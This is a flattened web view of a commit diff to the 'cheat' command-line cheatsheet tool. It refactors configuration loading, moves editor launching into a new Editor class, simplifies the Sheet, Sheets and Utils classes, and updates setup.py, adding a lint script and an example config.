||||||
|
|
||||||
self._check_configuration(merged_config)
|
# self.cheat_colors
|
||||||
|
self.cheat_colors = self._select([
|
||||||
|
Utils.boolify(os.environ.get('CHEAT_COLORS')),
|
||||||
|
Utils.boolify(os.environ.get('CHEATCOLORS')),
|
||||||
|
Utils.boolify(config.get('CHEAT_COLORS')),
|
||||||
|
True,
|
||||||
|
])
|
||||||
|
|
||||||
return merged_config
|
# self.cheat_colorscheme
|
||||||
|
self.cheat_colorscheme = self._select([
|
||||||
|
os.environ.get('CHEAT_COLORSCHEME'),
|
||||||
|
config.get('CHEAT_COLORSCHEME'),
|
||||||
|
'light',
|
||||||
|
]).strip().lower()
|
||||||
|
|
||||||
def _read_configuration_file(self, path):
|
# self.cheat_user_dir
|
||||||
# Reads configuration file and returns list of set variables
|
self.cheat_user_dir = self._select(
|
||||||
read_config = {}
|
map(os.path.expanduser,
|
||||||
if (os.path.isfile(path)):
|
filter(None,
|
||||||
|
[os.environ.get('CHEAT_USER_DIR'),
|
||||||
|
os.environ.get('CHEAT_DEFAULT_DIR'),
|
||||||
|
os.environ.get('DEFAULT_CHEAT_DIR'),
|
||||||
|
os.path.join('~', '.cheat')])))
|
||||||
|
|
||||||
|
# self.cheat_editor
|
||||||
|
self.cheat_editor = self._select([
|
||||||
|
os.environ.get('CHEAT_EDITOR'),
|
||||||
|
os.environ.get('EDITOR'),
|
||||||
|
os.environ.get('VISUAL'),
|
||||||
|
config.get('CHEAT_EDITOR'),
|
||||||
|
'vi',
|
||||||
|
])
|
||||||
|
|
||||||
|
# self.cheat_highlight
|
||||||
|
self.cheat_highlight = self._select([
|
||||||
|
os.environ.get('CHEAT_HIGHLIGHT'),
|
||||||
|
config.get('CHEAT_HIGHLIGHT'),
|
||||||
|
False,
|
||||||
|
])
|
||||||
|
if isinstance(self.cheat_highlight, str):
|
||||||
|
Utils.boolify(self.cheat_highlight)
|
||||||
|
|
||||||
|
# self.cheat_path
|
||||||
|
self.cheat_path = self._select([
|
||||||
|
os.environ.get('CHEAT_PATH'),
|
||||||
|
os.environ.get('CHEATPATH'),
|
||||||
|
config.get('CHEAT_PATH'),
|
||||||
|
appdirs.user_data_dir('cheat', 'cheat'),
|
||||||
|
])
|
||||||
|
|
||||||
|
def _read_config_file(self, path):
|
||||||
|
""" Reads configuration file and returns list of set variables """
|
||||||
|
config = {}
|
||||||
|
if os.path.isfile(path):
|
||||||
with open(path) as config_file:
|
with open(path) as config_file:
|
||||||
read_config.update(json.load(config_file))
|
config.update(json.load(config_file))
|
||||||
return read_config
|
return config
|
||||||
|
|
||||||
def _read_env_vars_config(self):
|
def _select(self, values):
|
||||||
read_config = {}
|
for v in values:
|
||||||
|
if v is not None:
|
||||||
|
return v
|
||||||
|
|
||||||
# NOTE: These variables are left here because of backwards
|
def validate(self):
|
||||||
# compatibility and are supported only as env vars but not in
|
""" Validates configuration parameters """
|
||||||
# configuration file
|
|
||||||
|
|
||||||
if (os.environ.get('VISUAL')):
|
# assert that cheat_highlight contains a valid value
|
||||||
read_config['EDITOR'] = os.environ.get('VISUAL')
|
highlights = [
|
||||||
|
|
||||||
# variables supported both in environment and configuration file
|
|
||||||
# NOTE: Variables without CHEAT_ prefix are legacy
|
|
||||||
# key is variable name and value is its legacy_alias
|
|
||||||
# if variable has no legacy alias then set to None
|
|
||||||
variables = {'CHEAT_DEFAULT_DIR': 'DEFAULT_CHEAT_DIR',
|
|
||||||
'CHEAT_PATH': 'CHEATPATH',
|
|
||||||
'CHEAT_COLORS': 'CHEATCOLORS',
|
|
||||||
'CHEAT_EDITOR': 'EDITOR',
|
|
||||||
'CHEAT_HIGHLIGHT': None
|
|
||||||
}
|
|
||||||
|
|
||||||
for (k, v) in variables.items():
|
|
||||||
self._read_env_var(read_config, k, v)
|
|
||||||
|
|
||||||
return read_config
|
|
||||||
|
|
||||||
def _check_configuration(self, config):
|
|
||||||
""" Check values in config and warn user or die """
|
|
||||||
|
|
||||||
# validate CHEAT_HIGHLIGHT values if set
|
|
||||||
colors = [
|
|
||||||
'grey', 'red', 'green', 'yellow',
|
'grey', 'red', 'green', 'yellow',
|
||||||
'blue', 'magenta', 'cyan', 'white'
|
'blue', 'magenta', 'cyan', 'white',
|
||||||
|
False
|
||||||
]
|
]
|
||||||
if (
|
if self.cheat_highlight not in highlights:
|
||||||
config.get('CHEAT_HIGHLIGHT') and
|
Utils.die("%s %s" %
|
||||||
config.get('CHEAT_HIGHLIGHT') not in colors
|
('CHEAT_HIGHLIGHT must be one of:', highlights))
|
||||||
):
|
|
||||||
Utils.die("%s %s" % ('CHEAT_HIGHLIGHT must be one of:', colors))
|
|
||||||
|
|
||||||
def _read_env_var(self, current_config, key, alias=None):
|
# assert that the color scheme is valid
|
||||||
if os.environ.get(key) is not None:
|
colorschemes = ['light', 'dark']
|
||||||
current_config[key] = os.environ.get(key)
|
if self.cheat_colorscheme not in colorschemes:
|
||||||
return
|
Utils.die("%s %s" %
|
||||||
elif alias is not None and os.environ.get(alias) is not None:
|
('CHEAT_COLORSCHEME must be one of:', colorschemes))
|
||||||
current_config[key] = os.environ.get(alias)
|
|
||||||
return
|
|
||||||
|
|
||||||
def _get_global_conf_file_path(self):
|
return True
|
||||||
self.glob_config_path = (os.environ.get('CHEAT_GLOBAL_CONF_PATH')
|
|
||||||
or '/etc/cheat')
|
|
||||||
|
|
||||||
def _get_local_conf_file_path(self):
|
|
||||||
path = (os.environ.get('CHEAT_LOCAL_CONF_PATH')
|
|
||||||
or os.path.expanduser('~/.config/cheat/cheat'))
|
|
||||||
self.local_config_path = path
|
|
||||||
|
|
||||||
def _choose_value(self, primary_value_name, secondary_value_name):
|
|
||||||
""" Return primary or secondary value in saved_configuration
|
|
||||||
|
|
||||||
If primary value is in configuration then return it. If it is not
|
|
||||||
then return secondary. In the absence of both values return None
|
|
||||||
"""
|
|
||||||
|
|
||||||
primary_value = self._saved_configuration.get(primary_value_name)
|
|
||||||
secondary_value = self._saved_configuration.get(secondary_value_name)
|
|
||||||
|
|
||||||
if primary_value is not None:
|
|
||||||
return primary_value
|
|
||||||
else:
|
|
||||||
return secondary_value
|
|
||||||
|
|
||||||
def get_default_cheat_dir(self):
|
|
||||||
return self._choose_value('CHEAT_DEFAULT_DIR', 'DEFAULT_CHEAT_DIR')
|
|
||||||
|
|
||||||
def get_cheatpath(self):
|
|
||||||
return self._choose_value('CHEAT_PATH', 'CHEATPATH')
|
|
||||||
|
|
||||||
def get_cheatcolors(self):
|
|
||||||
return self._choose_value('CHEAT_COLORS', 'CHEATCOLORS')
|
|
||||||
|
|
||||||
def get_editor(self):
|
|
||||||
return self._choose_value('CHEAT_EDITOR', 'EDITOR')
|
|
||||||
|
|
||||||
def get_highlight(self):
|
|
||||||
return self._saved_configuration.get('CHEAT_HIGHLIGHT')
|
|
||||||
|
29
cheat/editor.py
Normal file
29
cheat/editor.py
Normal file
@ -0,0 +1,29 @@
|
|||||||
|
from __future__ import print_function
|
||||||
|
from cheat.utils import Utils
|
||||||
|
import subprocess
|
||||||
|
|
||||||
|
|
||||||
|
class Editor:
|
||||||
|
|
||||||
|
def __init__(self, config):
|
||||||
|
self._config = config
|
||||||
|
|
||||||
|
def editor(self):
|
||||||
|
""" Determines the user's preferred editor """
|
||||||
|
|
||||||
|
# assert that the editor is set
|
||||||
|
if not self._config.cheat_editor:
|
||||||
|
Utils.die(
|
||||||
|
'You must set a CHEAT_EDITOR, VISUAL, or EDITOR environment '
|
||||||
|
'variable or setting in order to create/edit a cheatsheet.'
|
||||||
|
)
|
||||||
|
|
||||||
|
return self._config.cheat_editor
|
||||||
|
|
||||||
|
def open(self, filepath):
|
||||||
|
""" Open `filepath` using the EDITOR specified by the env variables """
|
||||||
|
editor_cmd = self.editor().split()
|
||||||
|
try:
|
||||||
|
subprocess.call(editor_cmd + [filepath])
|
||||||
|
except OSError:
|
||||||
|
Utils.die('Could not launch ' + self.editor())
|
@ -1,78 +1,64 @@
|
|||||||
|
from cheat.editor import Editor
|
||||||
|
from cheat.utils import Utils
|
||||||
|
import io
|
||||||
import os
|
import os
|
||||||
import shutil
|
import shutil
|
||||||
|
|
||||||
from cheat.utils import Utils
|
|
||||||
|
|
||||||
|
|
||||||
class Sheet:
|
class Sheet:
|
||||||
|
|
||||||
def __init__(self, sheets, utils):
|
def __init__(self, config, sheets):
|
||||||
|
self._config = config
|
||||||
|
self._editor = Editor(config)
|
||||||
self._sheets = sheets
|
self._sheets = sheets
|
||||||
self._utils = utils
|
|
||||||
|
|
||||||
def copy(self, current_sheet_path, new_sheet_path):
|
def _exists(self, sheet):
|
||||||
""" Copies a sheet to a new path """
|
|
||||||
|
|
||||||
# attempt to copy the sheet to DEFAULT_CHEAT_DIR
|
|
||||||
try:
|
|
||||||
shutil.copy(current_sheet_path, new_sheet_path)
|
|
||||||
|
|
||||||
# fail gracefully if the cheatsheet cannot be copied. This can happen
|
|
||||||
# if DEFAULT_CHEAT_DIR does not exist
|
|
||||||
except IOError:
|
|
||||||
Utils.die('Could not copy cheatsheet for editing.')
|
|
||||||
|
|
||||||
def create_or_edit(self, sheet):
|
|
||||||
""" Creates or edits a cheatsheet """
|
|
||||||
|
|
||||||
# if the cheatsheet does not exist
|
|
||||||
if not self.exists(sheet):
|
|
||||||
self.create(sheet)
|
|
||||||
|
|
||||||
# if the cheatsheet exists but not in the default_path, copy it to the
|
|
||||||
# default path before editing
|
|
||||||
elif self.exists(sheet) and not self.exists_in_default_path(sheet):
|
|
||||||
self.copy(self.path(sheet),
|
|
||||||
os.path.join(self._sheets.default_path(), sheet))
|
|
||||||
self.edit(sheet)
|
|
||||||
|
|
||||||
# if it exists and is in the default path, then just open it
|
|
||||||
else:
|
|
||||||
self.edit(sheet)
|
|
||||||
|
|
||||||
def create(self, sheet):
|
|
||||||
""" Creates a cheatsheet """
|
|
||||||
new_sheet_path = os.path.join(self._sheets.default_path(), sheet)
|
|
||||||
self._utils.open_with_editor(new_sheet_path)
|
|
||||||
|
|
||||||
def edit(self, sheet):
|
|
||||||
""" Opens a cheatsheet for editing """
|
|
||||||
self._utils.open_with_editor(self.path(sheet))
|
|
||||||
|
|
||||||
def exists(self, sheet):
|
|
||||||
""" Predicate that returns true if the sheet exists """
|
""" Predicate that returns true if the sheet exists """
|
||||||
return (sheet in self._sheets.get() and
|
return (sheet in self._sheets.get() and
|
||||||
os.access(self.path(sheet), os.R_OK))
|
os.access(self._path(sheet), os.R_OK))
|
||||||
|
|
||||||
def exists_in_default_path(self, sheet):
|
def _exists_in_default_path(self, sheet):
|
||||||
""" Predicate that returns true if the sheet exists in default_path"""
|
""" Predicate that returns true if the sheet exists in default_path"""
|
||||||
default_path_sheet = os.path.join(self._sheets.default_path(), sheet)
|
default_path = os.path.join(self._config.cheat_user_dir, sheet)
|
||||||
return (sheet in self._sheets.get() and
|
return (sheet in self._sheets.get() and
|
||||||
os.access(default_path_sheet, os.R_OK))
|
os.access(default_path, os.R_OK))
|
||||||
|
|
||||||
def is_writable(self, sheet):
|
def _path(self, sheet):
|
||||||
""" Predicate that returns true if the sheet is writeable """
|
|
||||||
return (sheet in self._sheets.get() and
|
|
||||||
os.access(self.path(sheet), os.W_OK))
|
|
||||||
|
|
||||||
def path(self, sheet):
|
|
||||||
""" Returns a sheet's filesystem path """
|
""" Returns a sheet's filesystem path """
|
||||||
return self._sheets.get()[sheet]
|
return self._sheets.get()[sheet]
|
||||||
|
|
||||||
|
def edit(self, sheet):
|
||||||
|
""" Creates or edits a cheatsheet """
|
||||||
|
|
||||||
|
# if the cheatsheet does not exist
|
||||||
|
if not self._exists(sheet):
|
||||||
|
new_path = os.path.join(self._config.cheat_user_dir, sheet)
|
||||||
|
self._editor.open(new_path)
|
||||||
|
|
||||||
|
# if the cheatsheet exists but not in the default_path, copy it to the
|
||||||
|
# default path before editing
|
||||||
|
elif self._exists(sheet) and not self._exists_in_default_path(sheet):
|
||||||
|
try:
|
||||||
|
shutil.copy(
|
||||||
|
self._path(sheet),
|
||||||
|
os.path.join(self._config.cheat_user_dir, sheet)
|
||||||
|
)
|
||||||
|
|
||||||
|
# fail gracefully if the cheatsheet cannot be copied. This can
|
||||||
|
# happen if CHEAT_USER_DIR does not exist
|
||||||
|
except IOError:
|
||||||
|
Utils.die('Could not copy cheatsheet for editing.')
|
||||||
|
|
||||||
|
self._editor.open(self._path(sheet))
|
||||||
|
|
||||||
|
# if it exists and is in the default path, then just open it
|
||||||
|
else:
|
||||||
|
self._editor.open(self._path(sheet))
|
||||||
|
|
||||||
def read(self, sheet):
|
def read(self, sheet):
|
||||||
""" Returns the contents of the cheatsheet as a String """
|
""" Returns the contents of the cheatsheet as a String """
|
||||||
if not self.exists(sheet):
|
if not self._exists(sheet):
|
||||||
Utils.die('No cheatsheet found for ' + sheet)
|
Utils.die('No cheatsheet found for ' + sheet)
|
||||||
|
|
||||||
with open(self.path(sheet)) as cheatfile:
|
with io.open(self._path(sheet), encoding='utf-8') as cheatfile:
|
||||||
return cheatfile.read()
|
return cheatfile.read()
|
||||||
|
@ -1,54 +1,34 @@
|
|||||||
import os
|
from cheat.colorize import Colorize
|
||||||
|
|
||||||
from cheat.utils import Utils
|
from cheat.utils import Utils
|
||||||
|
import io
|
||||||
|
import os
|
||||||
|
|
||||||
|
|
||||||
class Sheets:
|
class Sheets:
|
||||||
|
|
||||||
def __init__(self, config):
|
def __init__(self, config):
|
||||||
self._default_cheat_dir = config.get_default_cheat_dir()
|
self._config = config
|
||||||
self._cheatpath = config.get_cheatpath()
|
self._colorize = Colorize(config)
|
||||||
self._utils = Utils(config)
|
|
||||||
|
|
||||||
def default_path(self):
|
# Assembles a dictionary of cheatsheets as name => file-path
|
||||||
""" Returns the default cheatsheet path """
|
self._sheets = {}
|
||||||
|
sheet_paths = [
|
||||||
|
config.cheat_user_dir
|
||||||
|
]
|
||||||
|
|
||||||
# determine the default cheatsheet dir
|
# merge the CHEAT_PATH paths into the sheet_paths
|
||||||
default_sheets_dir = (self._default_cheat_dir or
|
if config.cheat_path:
|
||||||
os.path.join('~', '.cheat'))
|
for path in config.cheat_path.split(os.pathsep):
|
||||||
default_sheets_dir = os.path.expanduser(
|
if os.path.isdir(path):
|
||||||
os.path.expandvars(default_sheets_dir))
|
sheet_paths.append(path)
|
||||||
|
|
||||||
# create the DEFAULT_CHEAT_DIR if it does not exist
|
if not sheet_paths:
|
||||||
if not os.path.isdir(default_sheets_dir):
|
Utils.die('The CHEAT_USER_DIR dir does not exist '
|
||||||
try:
|
+ 'or the CHEAT_PATH is not set.')
|
||||||
# @kludge: unclear on why this is necessary
|
|
||||||
os.umask(0000)
|
|
||||||
os.mkdir(default_sheets_dir)
|
|
||||||
|
|
||||||
except OSError:
|
|
||||||
Utils.die('Could not create DEFAULT_CHEAT_DIR')
|
|
||||||
|
|
||||||
# assert that the DEFAULT_CHEAT_DIR is readable and writable
|
|
||||||
if not os.access(default_sheets_dir, os.R_OK):
|
|
||||||
Utils.die('The DEFAULT_CHEAT_DIR ('
|
|
||||||
+ default_sheets_dir
|
|
||||||
+ ') is not readable.')
|
|
||||||
if not os.access(default_sheets_dir, os.W_OK):
|
|
||||||
Utils.die('The DEFAULT_CHEAT_DIR ('
|
|
||||||
+ default_sheets_dir
|
|
||||||
+ ') is not writable.')
|
|
||||||
|
|
||||||
# return the default dir
|
|
||||||
return default_sheets_dir
|
|
||||||
|
|
||||||
def get(self):
|
|
||||||
""" Assembles a dictionary of cheatsheets as name => file-path """
|
|
||||||
cheats = {}
|
|
||||||
|
|
||||||
# otherwise, scan the filesystem
|
# otherwise, scan the filesystem
|
||||||
for cheat_dir in reversed(self.paths()):
|
for cheat_dir in reversed(sheet_paths):
|
||||||
cheats.update(
|
self._sheets.update(
|
||||||
dict([
|
dict([
|
||||||
(cheat, os.path.join(cheat_dir, cheat))
|
(cheat, os.path.join(cheat_dir, cheat))
|
||||||
for cheat in os.listdir(cheat_dir)
|
for cheat in os.listdir(cheat_dir)
|
||||||
@ -57,27 +37,22 @@ class Sheets:
|
|||||||
])
|
])
|
||||||
)
|
)
|
||||||
|
|
||||||
return cheats
|
def directories(self):
|
||||||
|
|
||||||
def paths(self):
|
|
||||||
""" Assembles a list of directories containing cheatsheets """
|
""" Assembles a list of directories containing cheatsheets """
|
||||||
sheet_paths = [
|
sheet_paths = [
|
||||||
self.default_path(),
|
self._config.cheat_user_dir,
|
||||||
'/usr/share/cheat',
|
|
||||||
]
|
]
|
||||||
|
|
||||||
# merge the CHEATPATH paths into the sheet_paths
|
# merge the CHEATPATH paths into the sheet_paths
|
||||||
if self._cheatpath:
|
for path in self._config.cheat_path.split(os.pathsep):
|
||||||
for path in self._cheatpath.split(os.pathsep):
|
|
||||||
if os.path.isdir(path):
|
|
||||||
sheet_paths.append(path)
|
sheet_paths.append(path)
|
||||||
|
|
||||||
if not sheet_paths:
|
|
||||||
Utils.die('The DEFAULT_CHEAT_DIR dir does not exist '
|
|
||||||
+ 'or the CHEATPATH is not set.')
|
|
||||||
|
|
||||||
return sheet_paths
|
return sheet_paths
|
||||||
|
|
||||||
|
def get(self):
|
||||||
|
""" Returns a dictionary of cheatsheets as name => file-path """
|
||||||
|
return self._sheets
|
||||||
|
|
||||||
def list(self):
|
def list(self):
|
||||||
""" Lists the available cheatsheets """
|
""" Lists the available cheatsheets """
|
||||||
sheet_list = ''
|
sheet_list = ''
|
||||||
@ -92,9 +67,9 @@ class Sheets:
|
|||||||
|
|
||||||
for cheatsheet in sorted(self.get().items()):
|
for cheatsheet in sorted(self.get().items()):
|
||||||
match = ''
|
match = ''
|
||||||
for line in open(cheatsheet[1]):
|
for line in io.open(cheatsheet[1], encoding='utf-8'):
|
||||||
if term in line:
|
if term in line:
|
||||||
match += ' ' + self._utils.highlight(term, line)
|
match += ' ' + self._colorize.search(term, line)
|
||||||
|
|
||||||
if match != '':
|
if match != '':
|
||||||
result += cheatsheet[0] + ":\n" + match + "\n"
|
result += cheatsheet[0] + ":\n" + match + "\n"
|
||||||
|
@ -1,100 +1,26 @@
|
|||||||
from __future__ import print_function
|
from __future__ import print_function
|
||||||
import os
|
|
||||||
import subprocess
|
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
|
|
||||||
class Utils:
|
class Utils:
|
||||||
|
|
||||||
def __init__(self, config):
|
|
||||||
self._displaycolors = config.get_cheatcolors()
|
|
||||||
self._editor_executable = config.get_editor()
|
|
||||||
self._highlight_color = config.get_highlight()
|
|
||||||
|
|
||||||
def highlight(self, needle, haystack):
|
|
||||||
""" Highlights a search term matched within a line """
|
|
||||||
|
|
||||||
# if a highlight color is not configured, exit early
|
|
||||||
if not self._highlight_color:
|
|
||||||
return haystack
|
|
||||||
|
|
||||||
# otherwise, attempt to import the termcolor library
|
|
||||||
try:
|
|
||||||
from termcolor import colored
|
|
||||||
|
|
||||||
# if the import fails, return uncolored text
|
|
||||||
except ImportError:
|
|
||||||
return haystack
|
|
||||||
|
|
||||||
# if the import succeeds, colorize the needle in haystack
|
|
||||||
return haystack.replace(needle, colored(needle, self._highlight_color))
|
|
||||||
|
|
||||||
def colorize(self, sheet_content):
|
|
||||||
""" Colorizes cheatsheet content if so configured """
|
|
||||||
|
|
||||||
# cover all possible positive values to be safe
|
|
||||||
positive_values = ["True", "true", "1", 1, True]
|
|
||||||
|
|
||||||
# only colorize if configured to do so, and if stdout is a tty
|
|
||||||
if (self._displaycolors not in positive_values or
|
|
||||||
not sys.stdout.isatty()):
|
|
||||||
return sheet_content
|
|
||||||
|
|
||||||
# don't attempt to colorize an empty cheatsheet
|
|
||||||
if not sheet_content.strip():
|
|
||||||
return ""
|
|
||||||
|
|
||||||
# otherwise, attempt to import the pygments library
|
|
||||||
try:
|
|
||||||
from pygments import highlight
|
|
||||||
from pygments.lexers import get_lexer_by_name
|
|
||||||
from pygments.formatters import TerminalFormatter
|
|
||||||
|
|
||||||
# if the import fails, return uncolored text
|
|
||||||
except ImportError:
|
|
||||||
return sheet_content
|
|
||||||
|
|
||||||
# otherwise, attempt to colorize
|
|
||||||
first_line = sheet_content.splitlines()[0]
|
|
||||||
lexer = get_lexer_by_name('bash')
|
|
||||||
|
|
||||||
# apply syntax-highlighting if the first line is a code-fence
|
|
||||||
if first_line.startswith('```'):
|
|
||||||
sheet_content = '\n'.join(sheet_content.split('\n')[1:-2])
|
|
||||||
try:
|
|
||||||
lexer = get_lexer_by_name(first_line[3:])
|
|
||||||
except Exception:
|
|
||||||
pass
|
|
||||||
|
|
||||||
return highlight(sheet_content, lexer, TerminalFormatter())
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def die(message):
|
def die(message):
|
||||||
""" Prints a message to stderr and then terminates """
|
""" Prints a message to stderr and then terminates """
|
||||||
Utils.warn(message)
|
Utils.warn(message)
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
def editor(self):
|
|
||||||
""" Determines the user's preferred editor """
|
|
||||||
|
|
||||||
# assert that the editor is set
|
|
||||||
if (not self._editor_executable):
|
|
||||||
Utils.die(
|
|
||||||
'You must set a CHEAT_EDITOR, VISUAL, or EDITOR environment '
|
|
||||||
'variable or setting in order to create/edit a cheatsheet.'
|
|
||||||
)
|
|
||||||
|
|
||||||
return self._editor_executable
|
|
||||||
|
|
||||||
def open_with_editor(self, filepath):
|
|
||||||
""" Open `filepath` using the EDITOR specified by the env variables """
|
|
||||||
editor_cmd = self.editor().split()
|
|
||||||
try:
|
|
||||||
subprocess.call(editor_cmd + [filepath])
|
|
||||||
except OSError:
|
|
||||||
Utils.die('Could not launch ' + self.editor())
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def warn(message):
|
def warn(message):
|
||||||
""" Prints a message to stderr """
|
""" Prints a message to stderr """
|
||||||
print((message), file=sys.stderr)
|
print((message), file=sys.stderr)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def boolify(value):
|
||||||
|
""" Type-converts 'true' and 'false' to Booleans """
|
||||||
|
# if `value` is not a string, return it as-is
|
||||||
|
if not isinstance(value, str):
|
||||||
|
return value
|
||||||
|
|
||||||
|
# otherwise, convert "true" and "false" to Boolean counterparts
|
||||||
|
return value.strip().lower() == "true"
|
||||||
|
10
ci/lint.sh
Executable file
10
ci/lint.sh
Executable file
@ -0,0 +1,10 @@
|
|||||||
|
#!/bin/sh
|
||||||
|
|
||||||
|
# Resolve the app root
|
||||||
|
SCRIPT=`realpath $0`
|
||||||
|
SCRIPTPATH=`dirname $SCRIPT`
|
||||||
|
APPROOT=`realpath "$SCRIPTPATH/.."`
|
||||||
|
|
||||||
|
flake8 $APPROOT/setup.py
|
||||||
|
flake8 $APPROOT/bin/cheat
|
||||||
|
flake8 $APPROOT/cheat/*.py --exclude=appdirs.py
|
@ -1 +0,0 @@
|
|||||||
{"CHEAT_COLORS":true,"CHEAT_EDITOR":"vi"}
|
|
6
config/cheat.example.conf
Normal file
6
config/cheat.example.conf
Normal file
@ -0,0 +1,6 @@
|
|||||||
|
{
|
||||||
|
"CHEAT_COLORS" : true,
|
||||||
|
"CHEAT_COLORSCHEME" : "light",
|
||||||
|
"CHEAT_EDITOR" : "vi",
|
||||||
|
"CHEAT_PATH" : "/usr/share/cheat"
|
||||||
|
}
|
36
setup.py
36
setup.py
@ -1,32 +1,40 @@
|
|||||||
|
from cheat.appdirs import user_data_dir
|
||||||
from distutils.core import setup
|
from distutils.core import setup
|
||||||
import os
|
import os
|
||||||
|
|
||||||
|
# determine the path in which to install the cheatsheets included with the
|
||||||
|
# package
|
||||||
|
cheat_path = os.environ.get('CHEAT_PATH') or \
|
||||||
|
user_data_dir('cheat', 'cheat')
|
||||||
|
|
||||||
|
# aggregate the systme-wide cheatsheets
|
||||||
cheat_files = []
|
cheat_files = []
|
||||||
for f in os.listdir('cheat/cheatsheets/'):
|
for f in os.listdir('cheat/cheatsheets/'):
|
||||||
cheat_files.append(os.path.join('cheat/cheatsheets/',f))
|
cheat_files.append(os.path.join('cheat/cheatsheets/', f))
|
||||||
|
|
||||||
|
# specify build params
|
||||||
setup(
|
setup(
|
||||||
name = 'cheat',
|
name='cheat',
|
||||||
version = '2.4.0',
|
version='2.5.1',
|
||||||
author = 'Chris Lane',
|
author='Chris Lane',
|
||||||
author_email = 'chris@chris-allen-lane.com',
|
author_email='chris@chris-allen-lane.com',
|
||||||
license = 'GPL3',
|
license='GPL3',
|
||||||
description = 'cheat allows you to create and view interactive cheatsheets '
|
description='cheat allows you to create and view interactive cheatsheets '
|
||||||
'on the command-line. It was designed to help remind *nix system '
|
'on the command-line. It was designed to help remind *nix system '
|
||||||
'administrators of options for commands that they use frequently, but not '
|
'administrators of options for commands that they use frequently, but not '
|
||||||
'frequently enough to remember.',
|
'frequently enough to remember.',
|
||||||
url = 'https://github.com/chrisallenlane/cheat',
|
url='https://github.com/chrisallenlane/cheat',
|
||||||
packages = [
|
packages=[
|
||||||
'cheat',
|
'cheat',
|
||||||
'cheat.test',
|
'cheat.test',
|
||||||
],
|
],
|
||||||
scripts = ['bin/cheat'],
|
scripts=['bin/cheat'],
|
||||||
install_requires = [
|
install_requires=[
|
||||||
'docopt >= 0.6.1',
|
'docopt >= 0.6.1',
|
||||||
'pygments >= 1.6.0',
|
'pygments >= 1.6.0',
|
||||||
|
'termcolor >= 1.1.0',
|
||||||
],
|
],
|
||||||
data_files = [
|
data_files=[
|
||||||
('/usr/share/cheat', cheat_files),
|
(cheat_path, cheat_files),
|
||||||
('/etc', ['config/cheat']),
|
|
||||||
],
|
],
|
||||||
)
|
)
|
||||||
|
Reference in New Issue
Block a user